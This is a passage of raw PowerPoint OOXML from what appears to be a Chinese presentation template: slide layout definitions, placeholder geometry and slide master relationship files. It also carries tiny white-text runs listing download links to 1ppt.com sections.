              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/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字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/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 </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout98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98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98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98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9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990.xml><?xml version="1.0" encoding="utf-8"?>
<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="objOnly" preserve="1">
  <p:cSld name="内容">
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name=""/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2" name="内容占位符 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="838200" y="365125"/>
            <a:ext cx="10515600" cy="58118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99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endParaRPr lang="zh-CN" altLang="en-US"/>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99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idx="1"/>
          </p:nvPr>
        </p:nvSpPr>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99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99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99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1186774" y="1778438"/>
            <a:ext cx="4873574"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1186774" y="2665379"/>
            <a:ext cx="4873574"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256938" y="1778438"/>
            <a:ext cx="4897576" cy="823912"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" indent="0">
              <a:buNone/>
              <a:defRPr sz="2800"/>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" indent="0">
              <a:buNone/>
              <a:defRPr sz="2400"/>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" indent="0">
              <a:buNone/>
              <a:defRPr sz="2000"/>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl4pPr>
            <a:lvl5pPr marL="1828800" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl5pPr>
            <a:lvl6pPr marL="2286000" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl6pPr>
            <a:lvl7pPr marL="2743200" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl7pPr>
            <a:lvl8pPr marL="3200400" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800"/>
            </a:lvl8pPr>
            <a:lvl9pPr marL="3657600" indent="0">
              <a:buNone/>
              <a:defRPr sz="1800"/>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256938" y="2665379"/>
            <a:ext cx="4897576" cy="352428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7D9BB5D0-35E4-459D-AEF3-FE4D7C45CC19}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="矩形 10"/>
          <p:cNvSpPr/>
          <p:nvPr userDrawn="1"/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8801478" y="6450175"/>
            <a:ext cx="775136" cy="246221"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>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模板下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/moban/     </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>行业</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www.1ppt.com/hangye/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节日</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模板：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jieri/           PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>素材下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/sucai/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背景图片：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/beijing/      PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>图表下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/tubiao/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优秀</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/xiazai/        PPT</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www.1ppt.com/powerpoint/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Word</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程： </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/word/              Excel</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>教程：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/excel/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资料下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziliao/                PPT</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>课件下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/kejian/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范文下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/fanwen/             </a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>试卷下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/shiti/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教案下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/jiaoan/        </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zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>字体下载：</a:t>
            </a:r>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t>www.1ppt.com/ziti/</a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="0" marR="0" lvl="0" indent="0" defTabSz="914400" eaLnBrk="1" fontAlgn="auto" latinLnBrk="0" hangingPunct="1">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buClrTx/>
              <a:buSzTx/>
              <a:buFontTx/>
              <a:buNone/>
              <a:defRPr/>
            </a:pPr>
            <a:r>
              <a:rPr kumimoji="0" lang="en-US" altLang="zh-CN" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:solidFill>
                  <a:prstClr val="white"/>
                </a:solidFill>
                <a:effectLst/>
                <a:uLnTx/>
                <a:uFillTx/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr kumimoji="0" lang="zh-CN" altLang="en-US" sz="100" b="0" i="0" u="none" strike="noStrike" kern="0" cap="none" spc="0" normalizeH="0" baseline="0" noProof="0" dirty="0" smtClean="0">
              <a:ln>
                <a:noFill/>
              </a:ln>
              <a:solidFill>
                <a:prstClr val="white"/>
              </a:solidFill>
              <a:effectLst/>
              <a:uLnTx/>
              <a:uFillTx/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideLayouts/slideLayout99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99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99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4165349"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5183188" y="457201"/>
            <a:ext cx="6172200" cy="540385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4165349" cy="3811588"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>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Layouts/slideLayout999.xml><?xml version="1.0" encoding="utf-8"?>
<p:sldLayout xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:p="http://schemas.openxmlformats.org/presentationml/2006/main" type="vertTitleAndTx" preserve="1">
  <p:cSld name="竖版">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82F288E0-7875-42C4-84C8-98DBBD3BF4D2}"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7D9BB5D0-35E4-459D-AEF3-FE4D7C45CC19}" type="slidenum">
              <a:rPr lang="zh-CN" altLang="en-US" smtClean="0"/>
            </a:fld>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
  </p:cSld>
  <p:clrMapOvr>
    <a:masterClrMapping/>
  </p:clrMapOvr>
</p:sldLayout>
</file>

<file path=ppt/slideMasters/_rels/slideMaster1.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout9.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout8.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout7.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout6.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout5.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout4.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout3.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout2.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme1.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout10.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster10.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout99.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout98.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout97.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout96.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout95.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout94.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout93.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout92.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme10.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout100.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout91.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster100.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout999.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout998.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout997.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout996.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout995.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout994.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout993.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout992.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme100.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image1.jpeg"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1000.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout991.xml"/></Relationships>
</file>

<file path=ppt/slideMasters/_rels/slideMaster101.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId9" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1009.xml"/><Relationship Id="rId8" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1008.xml"/><Relationship Id="rId7" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1007.xml"/><Relationship Id="rId6" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1006.xml"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1005.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1004.xml"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1003.xml"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout1002.xml"/><Relationship Id="rId12" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/theme" Target="../theme/theme101.xml"/><Relationship Id="rId11" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" 